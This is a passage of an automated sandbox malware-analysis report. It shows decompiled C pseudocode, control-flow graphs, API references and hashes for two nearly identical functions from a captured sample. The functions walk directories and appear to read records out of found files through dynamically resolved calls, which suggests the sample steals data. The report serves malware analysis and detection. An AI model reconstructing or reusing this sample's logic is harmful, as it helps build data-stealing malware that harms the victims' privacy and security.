                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F,?,00000000), ref: 0040B22A
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405,00000000,0040B40F), ref: 0040B248
                                                                                                    • GetProcAddress.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,0041B0FC,00000000,0000000B,00000000,00000000,?,0040B405), ref: 0040B266
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                    • String ID:
                                                                                                    • API String ID: 2238633743-0
                                                                                                    • Opcode ID: 588210b06e7466f33f668d0a8c5683e72e1db78c57bf2da9f1a5b49b6d1e0292
                                                                                                    • Instruction ID: 364380f0d352aef1bf1129e1f4ec87a81fdd7fa01391a9152c5138518fa9ee90
                                                                                                    • Opcode Fuzzy Hash: 588210b06e7466f33f668d0a8c5683e72e1db78c57bf2da9f1a5b49b6d1e0292
                                                                                                    • Instruction Fuzzy Hash: 5761E375A002099BDB01EBE5C985E9EB7BDFF44304F50453AB900FB385DA78EE0587A8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408D3C Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 339fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1140 408d3c-408d48 1141 408d4d-408d52 1140->1141 1141->1141 1142 408d54-408dd2 call 4040f4 call 403980 * 2 call 4047a8 call 403db8 call 403d3c FindFirstFileW 1141->1142 1155 408dd5-408e37 call 403d10 call 40813c call 403e1c call 403d3c GetFileAttributesW 1142->1155 1164 4090e6-4090fc FindNextFileW 1155->1164 1165 408e3d-408e99 call 403d10 call 40813c call 403e1c call 408a44 1155->1165 1164->1155 1167 409102-409107 1164->1167 1165->1167 1188 408e9f-408eac call 4045ec 1165->1188 1169 409109-40910d 1167->1169 1170 40913f-409147 1167->1170 1169->1170 1174 40910f-409133 1169->1174 1172 409174-4091dc call 403508 call 403b98 call 4034e4 call 4047b4 call 403508 call 4034e4 call 403b80 call 4034e4 1170->1172 1173 409149-409168 1170->1173 1173->1172 1174->1170 1188->1164 1194 408eb2-408eb3 1188->1194 1196 408eb5-408f04 call 40377c call 403760 call 403798 call 403990 1194->1196 1196->1167 1213 408f0a-408f1a 1196->1213 1213->1167 1215 408f20-408f36 1213->1215 1215->1167 1217 408f3c-408fa3 call 404f00 * 2 call 406984 call 4039e8 call 403790 call 4034e4 1215->1217 1231 408fa5-408fab 1217->1231 1232 408fdd-40904c call 4034e4 call 404f00 * 2 call 406984 call 4039e8 call 403790 call 4034e4 1217->1232 1231->1232 1234 408fad-408fae 1231->1234 1254 409086-4090e0 call 4034e4 call 403760 call 405210 1232->1254 1255 40904e-409054 1232->1255 1235 408fb5-408fdb call 4036cc call 403798 1234->1235 1235->1232 1254->1164 1254->1196 1255->1254 1256 409056-409057 1255->1256 1258 40905e-409084 call 4036cc call 403798 1256->1258 1258->1254
                                                                                                    C-Code - Quality: 61%
                                                                                                    			E00408D3C(intOrPtr* __eax, void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, char _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _v28;
				char _v29;
				char _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v68;
				struct _WIN32_FIND_DATAW _v660;
				char _v664;
				intOrPtr _v668;
				char _v672;
				char _v676;
				intOrPtr _v680;
				char _v684;
				char _v688;
				char _v692;
				char _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				char _v708;
				void* _t145;
				long _t155;
				int _t160;
				intOrPtr* _t162;
				intOrPtr* _t181;
				intOrPtr* _t187;
				void* _t205;
				intOrPtr* _t209;
				intOrPtr* _t212;
				intOrPtr* _t216;
				void* _t218;
				intOrPtr* _t235;
				void* _t237;
				intOrPtr* _t256;
				void* _t258;
				intOrPtr* _t270;
				intOrPtr* _t273;
				void* _t286;
				intOrPtr _t288;
				intOrPtr _t314;
				intOrPtr _t317;
				intOrPtr _t319;
				intOrPtr _t320;
				void* _t347;
				void* _t349;
				signed int _t351;
				intOrPtr _t353;
				intOrPtr _t354;
				intOrPtr _t355;
				void* _t356;

				_t350 = __esi;
				_t345 = __edi;
				_t284 = __ebx;
				 *((intOrPtr*)(__eax +  *__eax)) =  *((intOrPtr*)(__eax +  *__eax)) + __eax +  *__eax;
				_t353 = _t354;
				_t288 = 0x57;
				do {
					_push(0);
					_push(0);
					_t288 = _t288 - 1;
				} while (_t288 != 0);
				_push(_t288);
				_t1 =  &_v8;
				 *_t1 = _t288;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 =  *_t1;
				_v8 = __edx;
				E004040F4( &_v8);
				E00403980(_v12);
				E00403980(_a8);
				_push(_t353);
				_push(0x4091dd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t354;
				_push(0);
				E004047A8();
				_t355 = _t354 + 4;
				_v29 = 1;
				E00403DB8( &_v664, L"\\*.*", _v8, 0);
				_t145 = FindFirstFileW(E00403D3C(_v664),  &_v660); // executed
				_v28 = _t145;
				do {
					_push(_v8);
					E00403D10( &_v672, 0x104,  &(_v660.cFileName));
					_push(_v672);
					_push(E00409204);
					E0040813C(0x18,  &_v676);
					_push(_v676);
					E00403E1C();
					_t155 = GetFileAttributesW(E00403D3C(_v668)); // executed
					if(_t155 == 0xffffffff) {
						goto L20;
					} else {
						_push(_v8);
						E00403D10( &_v684, 0x104,  &(_v660.cFileName));
						_push(_v684);
						_push(E00409204);
						E0040813C(0x18,  &_v688);
						_push(_v688);
						E00403E1C();
						E00408A44(_v680, _t284,  &_v36, _t350);
						if(_v29 != 0) {
							_t284 = E004045EC(_v36) - 1;
							if(_t284 < 0) {
								goto L20;
							} else {
								_t286 = _t284 + 1;
								_t351 = 0;
								while(1) {
									E0040377C( &_v692, _v8);
									_push( &_v692);
									E00403760( &_v696, 0x104,  &(_v660.cFileName));
									_pop(_t205);
									E00403798(_t205, _v696);
									_push(E00403990(_v692));
									_t209 =  *0x41b5e0; // 0x41c7a0
									if( *((intOrPtr*)( *_t209))() != 0) {
										goto L21;
									}
									_t212 =  *0x41b5c0; // 0x41c7a4
									_v16 =  *((intOrPtr*)( *_t212))();
									if(_v16 != 0) {
										_t216 =  *0x41b640; // 0x41c7a8
										_t218 =  *((intOrPtr*)( *_t216))(_v16, 1, 0);
										_t355 = _t355 + 0xc;
										if(_t218 == 0) {
											E00404F00();
											E00404F00();
											E00406984( *((intOrPtr*)(_v36 + 4 + (_t351 + _t351 * 2) * 4)), _t286,  &_v44, _t345, _t351);
											_v56 = 0;
											_v52 = E004039E8( &_v44);
											_v48 = E00403790(_v44);
											E004034E4( &_v20);
											_t235 =  *0x41b61c; // 0x41c7ac
											_t237 =  *((intOrPtr*)( *_t235))( &_v56,  &_v68, 0);
											_t356 = _t355 + 0xc;
											if(_t237 == 0) {
												_t345 = _v60 - 1;
												if(_t345 >= 0) {
													_t349 = _t345 + 1;
													_v40 = 0;
													do {
														E004036CC();
														E00403798( &_v20, _v700);
														_v40 = _v40 + 1;
														_t349 = _t349 - 1;
													} while (_t349 != 0);
												}
											}
											E004034E4( &_v44);
											E00404F00();
											E00404F00();
											E00406984( *((intOrPtr*)(_v36 + 8 + (_t351 + _t351 * 2) * 4)), _t286,  &_v44, _t345, _t351);
											_v56 = 0;
											_v52 = E004039E8( &_v44);
											_v48 = E00403790(_v44);
											E004034E4( &_v24);
											_t256 =  *0x41b61c; // 0x41c7ac
											_t258 =  *((intOrPtr*)( *_t256))( &_v56,  &_v68, 0);
											_t355 = _t356 + 0xc;
											if(_t258 == 0) {
												_t345 = _v60 - 1;
												if(_t345 >= 0) {
													_t347 = _t345 + 1;
													_v40 = 0;
													do {
														E004036CC();
														E00403798( &_v24, _v704);
														_v40 = _v40 + 1;
														_t347 = _t347 - 1;
													} while (_t347 != 0);
												}
											}
											E004034E4( &_v44);
											E00403760( &_v708, 0x104,  &(_v660.cFileName));
											E00405210(_a8, _t286,  *((intOrPtr*)(_v36 + (_t351 + _t351 * 2) * 4)), _v12, _t345, _t351, _v708, _v24, _v20);
											_t270 =  *0x41b668; // 0x41c7b4
											 *((intOrPtr*)( *_t270))(_v16);
											_t273 =  *0x41b5d8; // 0x41c7b0
											 *((intOrPtr*)( *_t273))();
											_t351 = _t351 + 1;
											_t286 = _t286 - 1;
											if(_t286 != 0) {
												continue;
											} else {
												goto L20;
											}
										}
									}
									goto L21;
								}
							}
						}
					}
					break;
					L20:
					_t160 = FindNextFileW(_v28,  &_v660); // executed
				} while (_t160 != 0);
				L21:
				if( &_v16 != 0 && _v16 != 0) {
					 *[fs:eax] = _t355;
					_t187 =  *0x41b668; // 0x41c7b4
					 *((intOrPtr*)( *_t187))(_v16,  *[fs:eax], 0x409135, _t353);
					_pop(_t320);
					 *[fs:eax] = _t320;
				}
				_t162 =  *0x41b5d8; // 0x41c7b0
				if( *_t162 != 0) {
					 *[fs:eax] = _t355;
					_t181 =  *0x41b5d8; // 0x41c7b0
					 *((intOrPtr*)( *_t181))( *[fs:eax], 0x40916a, _t353);
					_pop(_t319);
					 *[fs:eax] = _t319;
				}
				_pop(_t314);
				 *[fs:eax] = _t314;
				_push(E004091E4);
				E00403508( &_v708, 5);
				E00403B98( &_v688, 7);
				E004034E4( &_v44);
				_t317 =  *0x408a18; // 0x408a1c
				E004047B4( &_v36, _t317);
				E00403508( &_v24, 2);
				E004034E4( &_v12);
				E00403B80( &_v8);
				return E004034E4( &_a8);
			}






























































                                                                                                    0x00408d3c
                                                                                                    0x00408d3c
                                                                                                    0x00408d3c
                                                                                                    0x00408d3e
                                                                                                    0x00408d45
                                                                                                    0x00408d48
                                                                                                    0x00408d4d
                                                                                                    0x00408d4d
                                                                                                    0x00408d4f
                                                                                                    0x00408d51
                                                                                                    0x00408d51
                                                                                                    0x00408d54
                                                                                                    0x00408d55
                                                                                                    0x00408d55
                                                                                                    0x00408d58
                                                                                                    0x00408d59
                                                                                                    0x00408d5a
                                                                                                    0x00408d5b
                                                                                                    0x00408d5e
                                                                                                    0x00408d64
                                                                                                    0x00408d6c
                                                                                                    0x00408d74
                                                                                                    0x00408d7b
                                                                                                    0x00408d7c
                                                                                                    0x00408d81
                                                                                                    0x00408d84
                                                                                                    0x00408d87
                                                                                                    0x00408d97
                                                                                                    0x00408d9c
                                                                                                    0x00408d9f
                                                                                                    0x00408db8
                                                                                                    0x00408dd0
                                                                                                    0x00408dd2
                                                                                                    0x00408dd5
                                                                                                    0x00408dd5
                                                                                                    0x00408de9
                                                                                                    0x00408dee
                                                                                                    0x00408df4
                                                                                                    0x00408e04
                                                                                                    0x00408e09
                                                                                                    0x00408e1a
                                                                                                    0x00408e32
                                                                                                    0x00408e37
                                                                                                    0x00000000
                                                                                                    0x00408e3d
                                                                                                    0x00408e3d
                                                                                                    0x00408e51
                                                                                                    0x00408e56
                                                                                                    0x00408e5c
                                                                                                    0x00408e6c
                                                                                                    0x00408e71
                                                                                                    0x00408e82
                                                                                                    0x00408e90
                                                                                                    0x00408e99
                                                                                                    0x00408ea9
                                                                                                    0x00408eac
                                                                                                    0x00000000
                                                                                                    0x00408eb2
                                                                                                    0x00408eb2
                                                                                                    0x00408eb3
                                                                                                    0x00408eb5
                                                                                                    0x00408ebe
                                                                                                    0x00408ec9
                                                                                                    0x00408edb
                                                                                                    0x00408ee6
                                                                                                    0x00408ee7
                                                                                                    0x00408ef7
                                                                                                    0x00408ef8
                                                                                                    0x00408f04
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00408f0a
                                                                                                    0x00408f13
                                                                                                    0x00408f1a
                                                                                                    0x00408f28
                                                                                                    0x00408f2f
                                                                                                    0x00408f31
                                                                                                    0x00408f36
                                                                                                    0x00408f44
                                                                                                    0x00408f51
                                                                                                    0x00408f63
                                                                                                    0x00408f6a
                                                                                                    0x00408f75
                                                                                                    0x00408f80
                                                                                                    0x00408f86
                                                                                                    0x00408f95
                                                                                                    0x00408f9c
                                                                                                    0x00408f9e
                                                                                                    0x00408fa3
                                                                                                    0x00408fa8
                                                                                                    0x00408fab
                                                                                                    0x00408fad
                                                                                                    0x00408fae
                                                                                                    0x00408fb5
                                                                                                    0x00408fc4
                                                                                                    0x00408fd2
                                                                                                    0x00408fd7
                                                                                                    0x00408fda
                                                                                                    0x00408fda
                                                                                                    0x00408fb5
                                                                                                    0x00408fab
                                                                                                    0x00408fe0
                                                                                                    0x00408fed
                                                                                                    0x00408ffa
                                                                                                    0x0040900c
                                                                                                    0x00409013
                                                                                                    0x0040901e
                                                                                                    0x00409029
                                                                                                    0x0040902f
                                                                                                    0x0040903e
                                                                                                    0x00409045
                                                                                                    0x00409047
                                                                                                    0x0040904c
                                                                                                    0x00409051
                                                                                                    0x00409054
                                                                                                    0x00409056
                                                                                                    0x00409057
                                                                                                    0x0040905e
                                                                                                    0x0040906d
                                                                                                    0x0040907b
                                                                                                    0x00409080
                                                                                                    0x00409083
                                                                                                    0x00409083
                                                                                                    0x0040905e
                                                                                                    0x00409054
                                                                                                    0x00409089
                                                                                                    0x004090a7
                                                                                                    0x004090c2
                                                                                                    0x004090cb
                                                                                                    0x004090d2
                                                                                                    0x004090d5
                                                                                                    0x004090dc
                                                                                                    0x004090de
                                                                                                    0x004090df
                                                                                                    0x004090e0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004090e0
                                                                                                    0x00408f36
                                                                                                    0x00000000
                                                                                                    0x00408f1a
                                                                                                    0x00408eb5
                                                                                                    0x00408eac
                                                                                                    0x00408e99
                                                                                                    0x00000000
                                                                                                    0x004090e6
                                                                                                    0x004090f8
                                                                                                    0x004090fa
                                                                                                    0x00409102
                                                                                                    0x00409107
                                                                                                    0x0040911a
                                                                                                    0x00409121
                                                                                                    0x00409128
                                                                                                    0x0040912d
                                                                                                    0x00409130
                                                                                                    0x00409130
                                                                                                    0x0040913f
                                                                                                    0x00409147
                                                                                                    0x00409154
                                                                                                    0x00409157
                                                                                                    0x0040915e
                                                                                                    0x00409162
                                                                                                    0x00409165
                                                                                                    0x00409165
                                                                                                    0x00409176
                                                                                                    0x00409179
                                                                                                    0x0040917c
                                                                                                    0x0040918c
                                                                                                    0x0040919c
                                                                                                    0x004091a4
                                                                                                    0x004091ac
                                                                                                    0x004091b2
                                                                                                    0x004091bf
                                                                                                    0x004091c7
                                                                                                    0x004091cf
                                                                                                    0x004091dc

                                                                                                    APIs
                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0041A69E), ref: 00408DD0
                                                                                                    • GetFileAttributesW.KERNEL32(00000000,?,00409204,?,0041A69E,?,?,?,?,?,?,0041A69E), ref: 00408E32
                                                                                                    • FindNextFileW.KERNEL32(?,?,?,?,?,?,?,?,0041A69E), ref: 004090F8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$Find$AttributesFirstNext
                                                                                                    • String ID: \*.*
                                                                                                    • API String ID: 2194085478-1173974218
                                                                                                    • Opcode ID: 7c2d9d634b4927bbe86dd2d784de5aeeaa99b4bb87293a077af95bce882314e1
                                                                                                    • Instruction ID: 0d373cd88fde81d46e67ec363a4cd78273a777710110dde0edb0dabeac45b8c6
                                                                                                    • Opcode Fuzzy Hash: 7c2d9d634b4927bbe86dd2d784de5aeeaa99b4bb87293a077af95bce882314e1
                                                                                                    • Instruction Fuzzy Hash: 4AD12970A00209AFDB10EF95D885ADEB7F9EF49304F1041BAE504F72A1DB39AE45CB59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00408D44 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 337fileCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1270 408d44-408d48 1271 408d4d-408d52 1270->1271 1271->1271 1272 408d54-408dd2 call 4040f4 call 403980 * 2 call 4047a8 call 403db8 call 403d3c FindFirstFileW 1271->1272 1285 408dd5-408e37 call 403d10 call 40813c call 403e1c call 403d3c GetFileAttributesW 1272->1285 1294 4090e6-4090fc FindNextFileW 1285->1294 1295 408e3d-408e99 call 403d10 call 40813c call 403e1c call 408a44 1285->1295 1294->1285 1297 409102-409107 1294->1297 1295->1297 1318 408e9f-408eac call 4045ec 1295->1318 1299 409109-40910d 1297->1299 1300 40913f-409147 1297->1300 1299->1300 1304 40910f-409133 1299->1304 1302 409174-4091dc call 403508 call 403b98 call 4034e4 call 4047b4 call 403508 call 4034e4 call 403b80 call 4034e4 1300->1302 1303 409149-409168 1300->1303 1303->1302 1304->1300 1318->1294 1324 408eb2-408eb3 1318->1324 1326 408eb5-408f04 call 40377c call 403760 call 403798 call 403990 1324->1326 1326->1297 1343 408f0a-408f1a 1326->1343 1343->1297 1345 408f20-408f36 1343->1345 1345->1297 1347 408f3c-408fa3 call 404f00 * 2 call 406984 call 4039e8 call 403790 call 4034e4 1345->1347 1361 408fa5-408fab 1347->1361 1362 408fdd-40904c call 4034e4 call 404f00 * 2 call 406984 call 4039e8 call 403790 call 4034e4 1347->1362 1361->1362 1364 408fad-408fae 1361->1364 1384 409086-4090e0 call 4034e4 call 403760 call 405210 1362->1384 1385 40904e-409054 1362->1385 1365 408fb5-408fdb call 4036cc call 403798 1364->1365 1365->1362 1384->1294 1384->1326 1385->1384 1386 409056-409057 1385->1386 1388 40905e-409084 call 4036cc call 403798 1386->1388 1388->1384
                                                                                                    C-Code - Quality: 60%
                                                                                                    			E00408D44(void* __ebx, void* __ecx, char __edx, void* __edi, void* __esi, char _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				void* _v28;
				char _v29;
				char _v36;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				char _v56;
				intOrPtr _v60;
				void* _v64;
				char _v68;
				struct _WIN32_FIND_DATAW _v660;
				char _v664;
				intOrPtr _v668;
				char _v672;
				char _v676;
				intOrPtr _v680;
				char _v684;
				char _v688;
				char _v692;
				char _v696;
				intOrPtr _v700;
				intOrPtr _v704;
				char _v708;
				void* _t142;
				long _t152;
				int _t157;
				intOrPtr* _t159;
				intOrPtr* _t178;
				intOrPtr* _t184;
				void* _t202;
				intOrPtr* _t206;
				intOrPtr* _t209;
				intOrPtr* _t213;
				void* _t215;
				intOrPtr* _t232;
				void* _t234;
				intOrPtr* _t253;
				void* _t255;
				intOrPtr* _t267;
				intOrPtr* _t270;
				void* _t283;
				intOrPtr _t285;
				intOrPtr _t311;
				intOrPtr _t314;
				intOrPtr _t316;
				intOrPtr _t317;
				void* _t344;
				void* _t346;
				signed int _t348;
				intOrPtr _t350;
				intOrPtr _t351;
				intOrPtr _t352;
				void* _t353;

				_t347 = __esi;
				_t342 = __edi;
				_t281 = __ebx;
				_t350 = _t351;
				_t285 = 0x57;
				do {
					_push(0);
					_push(0);
					_t285 = _t285 - 1;
				} while (_t285 != 0);
				_push(_t285);
				_t1 =  &_v8;
				 *_t1 = _t285;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 =  *_t1;
				_v8 = __edx;
				E004040F4( &_v8);
				E00403980(_v12);
				E00403980(_a8);
				_push(_t350);
				_push(0x4091dd);
				_push( *[fs:eax]);
				 *[fs:eax] = _t351;
				_push(0);
				E004047A8();
				_t352 = _t351 + 4;
				_v29 = 1;
				E00403DB8( &_v664, L"\\*.*", _v8, 0);
				_t142 = FindFirstFileW(E00403D3C(_v664),  &_v660); // executed
				_v28 = _t142;
				do {
					_push(_v8);
					E00403D10( &_v672, 0x104,  &(_v660.cFileName));
					_push(_v672);
					_push(E00409204);
					E0040813C(0x18,  &_v676);
					_push(_v676);
					E00403E1C();
					_t152 = GetFileAttributesW(E00403D3C(_v668)); // executed
					if(_t152 == 0xffffffff) {
						goto L19;
					} else {
						_push(_v8);
						E00403D10( &_v684, 0x104,  &(_v660.cFileName));
						_push(_v684);
						_push(E00409204);
						E0040813C(0x18,  &_v688);
						_push(_v688);
						E00403E1C();
						E00408A44(_v680, _t281,  &_v36, _t347);
						if(_v29 != 0) {
							_t281 = E004045EC(_v36) - 1;
							if(_t281 < 0) {
								goto L19;
							} else {
								_t283 = _t281 + 1;
								_t348 = 0;
								while(1) {
									E0040377C( &_v692, _v8);
									_push( &_v692);
									E00403760( &_v696, 0x104,  &(_v660.cFileName));
									_pop(_t202);
									E00403798(_t202, _v696);
									_push(E00403990(_v692));
									_t206 =  *0x41b5e0; // 0x41c7a0
									if( *((intOrPtr*)( *_t206))() != 0) {
										goto L20;
									}
									_t209 =  *0x41b5c0; // 0x41c7a4
									_v16 =  *((intOrPtr*)( *_t209))();
									if(_v16 != 0) {
										_t213 =  *0x41b640; // 0x41c7a8
										_t215 =  *((intOrPtr*)( *_t213))(_v16, 1, 0);
										_t352 = _t352 + 0xc;
										if(_t215 == 0) {
											E00404F00();
											E00404F00();
											E00406984( *((intOrPtr*)(_v36 + 4 + (_t348 + _t348 * 2) * 4)), _t283,  &_v44, _t342, _t348);
											_v56 = 0;
											_v52 = E004039E8( &_v44);
											_v48 = E00403790(_v44);
											E004034E4( &_v20);
											_t232 =  *0x41b61c; // 0x41c7ac
											_t234 =  *((intOrPtr*)( *_t232))( &_v56,  &_v68, 0);
											_t353 = _t352 + 0xc;
											if(_t234 == 0) {
												_t342 = _v60 - 1;
												if(_t342 >= 0) {
													_t346 = _t342 + 1;
													_v40 = 0;
													do {
														E004036CC();
														E00403798( &_v20, _v700);
														_v40 = _v40 + 1;
														_t346 = _t346 - 1;
													} while (_t346 != 0);
												}
											}
											E004034E4( &_v44);
											E00404F00();
											E00404F00();
											E00406984( *((intOrPtr*)(_v36 + 8 + (_t348 + _t348 * 2) * 4)), _t283,  &_v44, _t342, _t348);
											_v56 = 0;
											_v52 = E004039E8( &_v44);
											_v48 = E00403790(_v44);
											E004034E4( &_v24);
											_t253 =  *0x41b61c; // 0x41c7ac
											_t255 =  *((intOrPtr*)( *_t253))( &_v56,  &_v68, 0);
											_t352 = _t353 + 0xc;
											if(_t255 == 0) {
												_t342 = _v60 - 1;
												if(_t342 >= 0) {
													_t344 = _t342 + 1;
													_v40 = 0;
													do {
														E004036CC();
														E00403798( &_v24, _v704);
														_v40 = _v40 + 1;
														_t344 = _t344 - 1;
													} while (_t344 != 0);
												}
											}
											E004034E4( &_v44);
											E00403760( &_v708, 0x104,  &(_v660.cFileName));
											E00405210(_a8, _t283,  *((intOrPtr*)(_v36 + (_t348 + _t348 * 2) * 4)), _v12, _t342, _t348, _v708, _v24, _v20);
											_t267 =  *0x41b668; // 0x41c7b4
											 *((intOrPtr*)( *_t267))(_v16);
											_t270 =  *0x41b5d8; // 0x41c7b0
											 *((intOrPtr*)( *_t270))();
											_t348 = _t348 + 1;
											_t283 = _t283 - 1;
											if(_t283 != 0) {
												continue;
											} else {
												goto L19;
											}
										}
									}
									goto L20;
								}
							}
						}
					}
					break;
					L19:
					_t157 = FindNextFileW(_v28,  &_v660); // executed
				} while (_t157 != 0);
				L20:
				if( &_v16 != 0 && _v16 != 0) {
					 *[fs:eax] = _t352;
					_t184 =  *0x41b668; // 0x41c7b4
					 *((intOrPtr*)( *_t184))(_v16,  *[fs:eax], 0x409135, _t350);
					_pop(_t317);
					 *[fs:eax] = _t317;
				}
				_t159 =  *0x41b5d8; // 0x41c7b0
				if( *_t159 != 0) {
					 *[fs:eax] = _t352;
					_t178 =  *0x41b5d8; // 0x41c7b0
					 *((intOrPtr*)( *_t178))( *[fs:eax], 0x40916a, _t350);
					_pop(_t316);
					 *[fs:eax] = _t316;
				}
				_pop(_t311);
				 *[fs:eax] = _t311;
				_push(E004091E4);
				E00403508( &_v708, 5);
				E00403B98( &_v688, 7);
				E004034E4( &_v44);
				_t314 =  *0x408a18; // 0x408a1c
				E004047B4( &_v36, _t314);
				E00403508( &_v24, 2);
				E004034E4( &_v12);
				E00403B80( &_v8);
				return E004034E4( &_a8);
			}






























































                                                                                                    0x00408d44
                                                                                                    0x00408d44
                                                                                                    0x00408d44
                                                                                                    0x00408d45
                                                                                                    0x00408d48
                                                                                                    0x00408d4d
                                                                                                    0x00408d4d
                                                                                                    0x00408d4f
                                                                                                    0x00408d51
                                                                                                    0x00408d51
                                                                                                    0x00408d54
                                                                                                    0x00408d55
                                                                                                    0x00408d55
                                                                                                    0x00408d58
                                                                                                    0x00408d59
                                                                                                    0x00408d5a
                                                                                                    0x00408d5b
                                                                                                    0x00408d5e
                                                                                                    0x00408d64
                                                                                                    0x00408d6c
                                                                                                    0x00408d74
                                                                                                    0x00408d7b
                                                                                                    0x00408d7c
                                                                                                    0x00408d81
                                                                                                    0x00408d84
                                                                                                    0x00408d87
                                                                                                    0x00408d97
                                                                                                    0x00408d9c
                                                                                                    0x00408d9f
                                                                                                    0x00408db8
                                                                                                    0x00408dd0
                                                                                                    0x00408dd2
                                                                                                    0x00408dd5
                                                                                                    0x00408dd5
                                                                                                    0x00408de9
                                                                                                    0x00408dee
                                                                                                    0x00408df4
                                                                                                    0x00408e04
                                                                                                    0x00408e09
                                                                                                    0x00408e1a
                                                                                                    0x00408e32
                                                                                                    0x00408e37
                                                                                                    0x00000000
                                                                                                    0x00408e3d
                                                                                                    0x00408e3d
                                                                                                    0x00408e51
                                                                                                    0x00408e56
                                                                                                    0x00408e5c
                                                                                                    0x00408e6c
                                                                                                    0x00408e71
                                                                                                    0x00408e82
                                                                                                    0x00408e90
                                                                                                    0x00408e99
                                                                                                    0x00408ea9
                                                                                                    0x00408eac
                                                                                                    0x00000000
                                                                                                    0x00408eb2
                                                                                                    0x00408eb2
                                                                                                    0x00408eb3
                                                                                                    0x00408eb5
                                                                                                    0x00408ebe
                                                                                                    0x00408ec9
                                                                                                    0x00408edb
                                                                                                    0x00408ee6
                                                                                                    0x00408ee7
                                                                                                    0x00408ef7
                                                                                                    0x00408ef8
                                                                                                    0x00408f04
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00408f0a
                                                                                                    0x00408f13
                                                                                                    0x00408f1a
                                                                                                    0x00408f28
                                                                                                    0x00408f2f
                                                                                                    0x00408f31
                                                                                                    0x00408f36
                                                                                                    0x00408f44
                                                                                                    0x00408f51
                                                                                                    0x00408f63
                                                                                                    0x00408f6a
                                                                                                    0x00408f75
                                                                                                    0x00408f80
                                                                                                    0x00408f86
                                                                                                    0x00408f95
                                                                                                    0x00408f9c
                                                                                                    0x00408f9e
                                                                                                    0x00408fa3
                                                                                                    0x00408fa8
                                                                                                    0x00408fab
                                                                                                    0x00408fad
                                                                                                    0x00408fae
                                                                                                    0x00408fb5
                                                                                                    0x00408fc4
                                                                                                    0x00408fd2
                                                                                                    0x00408fd7
                                                                                                    0x00408fda
                                                                                                    0x00408fda
                                                                                                    0x00408fb5
                                                                                                    0x00408fab
                                                                                                    0x00408fe0
                                                                                                    0x00408fed
                                                                                                    0x00408ffa
                                                                                                    0x0040900c
                                                                                                    0x00409013
                                                                                                    0x0040901e
                                                                                                    0x00409029
                                                                                                    0x0040902f
                                                                                                    0x0040903e
                                                                                                    0x00409045
                                                                                                    0x00409047
                                                                                                    0x0040904c
                                                                                                    0x00409051
                                                                                                    0x00409054
                                                                                                    0x00409056
                                                                                                    0x00409057
                                                                                                    0x0040905e
                                                                                                    0x0040906d
                                                                                                    0x0040907b
                                                                                                    0x00409080
                                                                                                    0x00409083
                                                                                                    0x00409083
                                                                                                    0x0040905e
                                                                                                    0x00409054
                                                                                                    0x00409089
                                                                                                    0x004090a7
                                                                                                    0x004090c2
                                                                                                    0x004090cb
                                                                                                    0x004090d2
                                                                                                    0x004090d5
                                                                                                    0x004090dc
                                                                                                    0x004090de
                                                                                                    0x004090df
                                                                                                    0x004090e0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x004090e0
                                                                                                    0x00408f36
                                                                                                    0x00000000
                                                                                                    0x00408f1a
                                                                                                    0x00408eb5
                                                                                                    0x00408eac
                                                                                                    0x00408e99
                                                                                                    0x00000000
                                                                                                    0x004090e6
                                                                                                    0x004090f8
                                                                                                    0x004090fa
                                                                                                    0x00409102
                                                                                                    0x00409107
                                                                                                    0x0040911a
                                                                                                    0x00409121
                                                                                                    0x00409128
                                                                                                    0x0040912d
                                                                                                    0x00409130
                                                                                                    0x00409130
                                                                                                    0x0040913f
                                                                                                    0x00409147
                                                                                                    0x00409154
                                                                                                    0x00409157
                                                                                                    0x0040915e
                                                                                                    0x00409162
                                                                                                    0x00409165
                                                                                                    0x00409165
                                                                                                    0x00409176
                                                                                                    0x00409179
                                                                                                    0x0040917c
                                                                                                    0x0040918c
